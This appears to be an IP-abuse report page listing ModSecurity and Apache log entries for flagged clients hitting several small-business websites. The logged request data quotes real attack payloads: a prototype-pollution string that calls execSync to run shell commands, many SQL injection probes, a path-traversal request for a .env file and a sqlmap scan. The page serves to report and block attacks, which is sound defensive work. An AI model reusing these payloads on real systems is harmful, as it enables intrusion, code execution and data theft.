|
πΊπΈ
34.174.157.190
|
|
[Wed Sep 09 01:09:22.694120 2026] [security2:error] [pid 4537:tid 4746] [client 34.174.157.190:58088 ...
show more
[Wed Sep 09 01:09:22.694120 2026] [security2:error] [pid 4537:tid 4746] [client 34.174.157.190:58088] [client 34.174.157.190] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:0. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x
show less
|
Web App Attack
|
|
π«π·
176.147.39.48
|
|
[Wed Sep 09 01:10:06.703871 2026] [security2:error] [pid 4860:tid 4898] [client 176.147.39.48:50000] ...
show more
[Wed Sep 09 01:10:06.703871 2026] [security2:error] [pid 4860:tid 4898] [client 176.147.39.48:50000] [client 176.147.39.48] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: /pages/ONeill-Girls-Compete-At-West-Holt-JH-Invite-a30803.html?view_archive=No found within ARGS:return: /pages/ONeill-Girls-Compete-At-West-Holt-JH-Invite-a30803.html?view_archive=No"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "holtindependent.com"] [uri "/subscribe/customer_login.php"] [unique_id "aqDqLvZZf2nVmcf3HRSKKQAAA5Y"]
show less
|
Web App Attack
|
|
π°π·
43.155.204.144
|
|
[Wed Sep 09 01:20:29.146095 2026] [security2:error] [pid 4536:tid 4769] [client 43.155.204.144:33436 ...
show more
[Wed Sep 09 01:20:29.146095 2026] [security2:error] [pid 4536:tid 4769] [client 43.155.204.144:33436] [client 43.155.204.144] ModSecurity: Warning. Matched phrase "sqlmap" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "33"] [id "913100"] [rev "2"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: sqlmap found within REQUEST_HEADERS:User-Agent: sqlmap/1.5.2.6#dev (http://sqlmap.org)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "slotcarstore.net"] [uri "/content/link_show.php"] [unique_id "aqDsnaNLIqrSB5x3nErHlQAAApE"]
show less
|
SQL Injection
|
|
πΈπ¬
34.158.56.84
|
|
[Wed Sep 09 02:00:24.781488 2026] [security2:error] [pid 4537:tid 4852] [client 34.158.56.84:49634] ...
show more
[Wed Sep 09 02:00:24.781488 2026] [security2:error] [pid 4537:tid 4852] [client 34.158.56.84:49634] [client 34.158.56.84] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /static../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "69.16.227.120"] [uri "/static../.env"] [unique_id "aqD1-KqPU8nOo51fgFw9RAAAAzA"]
show less
|
Web App Attack
|
|
π«π·
88.185.105.238
|
|
[Wed Sep 09 02:08:24.089505 2026] [security2:error] [pid 4537:tid 4852] [client 88.185.105.238:36369 ...
show more
[Wed Sep 09 02:08:24.089505 2026] [security2:error] [pid 4537:tid 4852] [client 88.185.105.238:36369] [client 88.185.105.238] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1UE' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s&1UE found within ARGS:db_type: 1' AND 1=1 UNION SELECT NULL-- -"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "catalog.onesourceofnj.com"] [uri "/subscribe/show_product.php"] [unique_id "aqD32KqPU8nOo51fgFw-4wAAAzA"]
show less
|
SQL Injection
|
|
π«π·
88.160.102.131
|
|
[Wed Sep 09 02:08:28.719903 2026] [security2:error] [pid 4537:tid 4779] [client 88.160.102.131:38630 ...
show more
[Wed Sep 09 02:08:28.719903 2026] [security2:error] [pid 4537:tid 4779] [client 88.160.102.131:38630] [client 88.160.102.131] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1UE' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s&1UE found within ARGS:db_type: 1' AND 1=1 UNION SELECT NULL-- -"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "catalog.onesourceofnj.com"] [uri "/subscribe/show_product.php"] [unique_id "aqD33KqPU8nOo51fgFw-6QAAAw8"]
show less
|
SQL Injection
|
|
π«π·
176.149.198.183
|
|
[Wed Sep 09 02:08:34.997375 2026] [security2:error] [pid 4537:tid 4752] [client 176.149.198.183:3809 ...
show more
[Wed Sep 09 02:08:34.997375 2026] [security2:error] [pid 4537:tid 4752] [client 176.149.198.183:38096] [client 176.149.198.183] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1UE' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s&1UE found within ARGS:db_type: 1' AND 1=1 UNION SELECT NULL-- -"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "catalog.onesourceofnj.com"] [uri "/subscribe/show_product.php"] [unique_id "aqD34qqPU8nOo51fgFw-7AAAAwY"]
show less
|
SQL Injection
|
|
π«π·
82.226.83.229
|
|
[Wed Sep 09 02:08:40.906074 2026] [security2:error] [pid 4535:tid 4717] [client 82.226.83.229:13474] ...
show more
[Wed Sep 09 02:08:40.906074 2026] [security2:error] [pid 4535:tid 4717] [client 82.226.83.229:13474] [client 82.226.83.229] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1UE' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s&1UE found within ARGS:db_type: 1' AND 1=1 UNION SELECT NULL-- -"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "catalog.onesourceofnj.com"] [uri "/subscribe/show_product.php"] [unique_id "aqD36BIOPsAvWg7VrctALAAAAdE"]
show less
|
SQL Injection
|
|
π«π·
88.181.189.141
|
|
[Wed Sep 09 02:08:58.382489 2026] [security2:error] [pid 4536:tid 4843] [client 88.181.189.141:48630 ...
show more
[Wed Sep 09 02:08:58.382489 2026] [security2:error] [pid 4536:tid 4843] [client 88.181.189.141:48630] [client 88.181.189.141] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's)&(s' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s)&(s found within ARGS:db_type: ') AND ('enmfbu'='enmfbu' UNION ALL SELECT 'kcczkliagbavoaowpujasxnpzfpbynbr'-- ekxt2i"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "catalog.onesourceofnj.com"] [uri "/subscribe/show_product.php"] [unique_id "aqD3-qNLIqrSB5x3nErMWwAAArA"]
show less
|
Web App Attack
|
|
π«π·
90.70.142.8
|
|
[Wed Sep 09 02:09:14.107807 2026] [security2:error] [pid 4537:tid 4770] [client 90.70.142.8:50992] [ ...
show more
[Wed Sep 09 02:09:14.107807 2026] [security2:error] [pid 4537:tid 4770] [client 90.70.142.8:50992] [client 90.70.142.8] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's)&(s' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s)&(s found within ARGS:db_type: ')/**/AND/**/('NgrWrA'='ngRwRa'AND/**/EXTRACTVALUE(1902,CONCAT(0x7e,((SELECT/**/(ELT(1902=1902,1)))),0x7e))"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "catalog.onesourceofnj.com"] [uri "/subscribe/show_product.php"] [unique_id "aqD4CqqPU8nOo51fgFw_EQAAAww"]
show less
|
Web App Attack
|
|
π«π·
176.139.187.177
|
|
[Wed Sep 09 02:09:27.602230 2026] [security2:error] [pid 4537:tid 4777] [client 176.139.187.177:4852 ...
show more
[Wed Sep 09 02:09:27.602230 2026] [security2:error] [pid 4537:tid 4777] [client 176.139.187.177:48522] [client 176.139.187.177] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table) |delete[[:space:]] .{1,100}+ update [a-z0-9]+ set .{1,100}+=|union all select |\\\\bunion\\\\b.{1,100}?\\\\bselect\\\\b.*[a-z0-9]+ from |select (?:load_file|char ?\\\\()|(?:insert|remark)tes ..." at ARGS:sourceid. [file "/etc/apache2/conf.d/modsec2/10_asl_rules.conf"] [line "318"] [id "340144"] [rev "35"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Generic SQL injection protection 2"] [data "get /subscribe/show_product.php?db_type=product&itemid=chy-83116&sourceid=%29%2f**%2fand%2f**%2f%281638874943%3d1638874943%2f**%2funion%2f**%2fall%2f**%2fselect%2f**%2f%27sjlwsdsuxxooiqudufshhcowsinowohl%27--%2f**%2fwox58u http/1.1"] [severity "CRITICAL"] [hostname "catalog.onesourceofnj.com"] [uri "/subscribe/show_product.php"] [unique_id "aqD4F6qPU8nOo51f
show less
|
Hacking
|
|
π«π·
37.66.43.227
|
|
[Wed Sep 09 02:09:42.906265 2026] [security2:error] [pid 4537:tid 4818] [client 37.66.43.227:56186] ...
show more
[Wed Sep 09 02:09:42.906265 2026] [security2:error] [pid 4537:tid 4818] [client 37.66.43.227:56186] [client 37.66.43.227] ModSecurity: Warning. detected SQLi using libinjection with fingerprint '1UEsc' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: 1UEsc found within ARGS:sourceid: 3091 UNION ALL SELECT 'sjlwsdsuxxooiqudufshhcowsinowohl',NULL-- 6vombv"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "catalog.onesourceofnj.com"] [uri "/subscribe/show_product.php"] [unique_id "aqD4JqqPU8nOo51fgFw_NQAAAx0"]
show less
|
Web App Attack
|
|
π«π·
176.142.143.149
|
|
[Wed Sep 09 02:09:53.673441 2026] [security2:error] [pid 4536:tid 4737] [client 176.142.143.149:4122 ...
show more
[Wed Sep 09 02:09:53.673441 2026] [security2:error] [pid 4536:tid 4737] [client 176.142.143.149:41222] [client 176.142.143.149] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'X' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: X found within ARGS:itemid: ')/*!50000AND*/('pzesvl'='pzesvl'/*!50000AND*/EXTRACTVALUE(4611,/*!50000CONCAT*/(0x7e,((/*!50000SELECT*/(ELT(4611=4611,1)))),0x7e))"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "catalog.onesourceofnj.com"] [uri "/subscribe/show_product.php"] [unique_id "aqD4MaNLIqrSB5x3nErMdgAAAoY"]
show less
|
Web App Attack
|
|
π«π·
88.175.43.162
|
|
[Wed Sep 09 02:10:08.475151 2026] [security2:error] [pid 4537:tid 4779] [client 88.175.43.162:51091] ...
show more
[Wed Sep 09 02:10:08.475151 2026] [security2:error] [pid 4537:tid 4779] [client 88.175.43.162:51091] [client 88.175.43.162] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&f(1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s&f(1 found within ARGS:itemid: CHY-83116%' AND EXTRACTVALUE(1136,CONCAT(0x7e,((SELECT (ELT(1136=1136,1)))),0x7e))-- -"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "catalog.onesourceofnj.com"] [uri "/subscribe/show_product.php"] [unique_id "aqD4QKqPU8nOo51fgFw_UgAAAw8"]
show less
|
Web App Attack
|
|
π«π·
84.103.92.27
|
|
[Wed Sep 09 02:10:22.971001 2026] [security2:error] [pid 4536:tid 4768] [client 84.103.92.27:56376] ...
show more
[Wed Sep 09 02:10:22.971001 2026] [security2:error] [pid 4536:tid 4768] [client 84.103.92.27:56376] [client 84.103.92.27] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'sUEvc' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: sUEvc found within ARGS:db_type: product' UNION ALL SELECT NULL,'kcczkliagbavoaowpujasxnpzfpbynbr'-- yeet69"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "catalog.onesourceofnj.com"] [uri "/subscribe/show_product.php"] [unique_id "aqD4TqNLIqrSB5x3nErMkQAAApA"]
show less
|
Web App Attack
|
|
π«π·
2.13.0.242
|
|
[Wed Sep 09 02:10:34.384475 2026] [security2:error] [pid 4537:tid 4806] [client 2.13.0.242:39670] [c ...
show more
[Wed Sep 09 02:10:34.384475 2026] [security2:error] [pid 4537:tid 4806] [client 2.13.0.242:39670] [client 2.13.0.242] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's)&(s' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s)&(s found within ARGS:db_type: ')/**/AND/**/('ynnqiw'='ynnqiw'/**/UNION/**/ALL/**/SELECT/**/NULL,'kcczkliagbavoaowpujasxnpzfpbynbr'--/**/yeet69"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "catalog.onesourceofnj.com"] [uri "/subscribe/show_product.php"] [unique_id "aqD4WqqPU8nOo51fgFw_dQAAAxc"]
show less
|
Web App Attack
|
|
πΊπΈ
52.167.144.25
|
|
52.167.144.25 - - [09/Sep/2026:02:19:55 -0400] "GET /content/search.php?tagid=&next_match=25&db_type ...
show more
52.167.144.25 - - [09/Sep/2026:02:19:55 -0400] "GET /content/search.php?tagid=&next_match=25&db_type=&categoryid=&search_for=%E0%B8%A7%E0%B8%B4%E0%B8%87%E0%B9%80%E0%B8%81%E0%B8%B4%E0%B8%A5+%E0%B8%A7%E0%B8%B4%E0%B8%87%E0%B9%80%E0%B8%81%E0%B8%B4%E0%B8%A5&and_or=and&find_duplicates= HTTP/1.1" 200 15587 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
show less
|
Hacking
|
|
ππ°
183.87.96.119
|
|
[Wed Sep 09 02:56:30.986956 2026] [security2:error] [pid 12689:tid 12947] [client 183.87.96.119:4242 ...
show more
[Wed Sep 09 02:56:30.986956 2026] [security2:error] [pid 12689:tid 12947] [client 183.87.96.119:42424] [client 183.87.96.119] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nwcdinc.com"] [uri "/content/page.php"] [unique_id "aqEDHhE68dh3Uqbh0dBxEgAABB0"], referer: https://nwcdinc.com/
show less
|
Hacking
|
|
πΊπΈ
143.244.151.232
|
|
[Wed Sep 09 02:56:32.521271 2026] [proxy_fcgi:error] [pid 12689:tid 12881] [client 143.244.151.232:6 ...
show more
[Wed Sep 09 02:56:32.521271 2026] [proxy_fcgi:error] [pid 12689:tid 12881] [client 143.244.151.232:63572] AH01071: Got error 'Primary script unknown'
show less
|
Hacking
|
|
ππ°
42.201.192.15
|
|
[Wed Sep 09 03:03:03.580674 2026] [security2:error] [pid 12689:tid 12910] [client 42.201.192.15:2347 ...
show more
[Wed Sep 09 03:03:03.580674 2026] [security2:error] [pid 12689:tid 12910] [client 42.201.192.15:23477] [client 42.201.192.15] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nwcdinc.com"] [uri "/content/page.php"] [unique_id "aqEEpxE68dh3Uqbh0dByYgAABA4"], referer: https://nwcdinc.com/
show less
|
Hacking
|
|
ππ°
183.87.99.121
|
|
[Wed Sep 09 03:05:53.799033 2026] [security2:error] [pid 12689:tid 12960] [client 183.87.99.121:5072 ...
show more
[Wed Sep 09 03:05:53.799033 2026] [security2:error] [pid 12689:tid 12960] [client 183.87.99.121:50726] [client 183.87.99.121] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nwcdinc.com"] [uri "/content/page.php"] [unique_id "aqEFURE68dh3Uqbh0dBzNQAABCM"], referer: https://nwcdinc.com/
show less
|
Hacking
|
|
πΊπΈ
165.22.188.26
|
|
[Wed Sep 09 03:15:00.244512 2026] [proxy_fcgi:error] [pid 12689:tid 12906] [client 165.22.188.26:613 ...
show more
[Wed Sep 09 03:15:00.244512 2026] [proxy_fcgi:error] [pid 12689:tid 12906] [client 165.22.188.26:61382] AH01071: Got error 'Primary script unknown'
show less
|
Hacking
|
|
π΅π
143.44.193.233
|
|
[Wed Sep 09 03:15:29.077950 2026] [security2:error] [pid 12689:tid 12988] [client 143.44.193.233:157 ...
show more
[Wed Sep 09 03:15:29.077950 2026] [security2:error] [pid 12689:tid 12988] [client 143.44.193.233:15713] [client 143.44.193.233] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:$mozilla^|mozilla/[45]\\\\.[1-9])" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec2/20_asl_useragents.conf"] [line "302"] [id "330131"] [rev "2"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Fake Mozilla User Agent String Detected"] [severity "CRITICAL"] [hostname "slotcarstore.net"] [uri "/"] [unique_id "aqEHkRE68dh3Uqbh0dB1CQAABDE"]
show less
|
Hacking
|
|
πΊπΈ
165.22.162.123
|
|
[Wed Sep 09 03:16:37.737349 2026] [proxy_fcgi:error] [pid 12689:tid 12887] [client 165.22.162.123:59 ...
show more
[Wed Sep 09 03:16:37.737349 2026] [proxy_fcgi:error] [pid 12689:tid 12887] [client 165.22.162.123:59883] AH01071: Got error 'Primary script unknown'
show less
|
Hacking
|
|
π«π·
78.112.63.240
|
|
[Wed Sep 09 03:26:20.813765 2026] [security2:error] [pid 12688:tid 12857] [client 78.112.63.240:1782 ...
show more
[Wed Sep 09 03:26:20.813765 2026] [security2:error] [pid 12688:tid 12857] [client 78.112.63.240:17828] [client 78.112.63.240] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1UE' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s&1UE found within ARGS:sourceid: 1' AND 1=1 UNION SELECT NULL-- -"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.nwcdinc.com"] [uri "/subscribe/show_product.php"] [unique_id "aqEKHHouqJQoKk7-vDgJUgAAA0o"]
show less
|
Web App Attack
|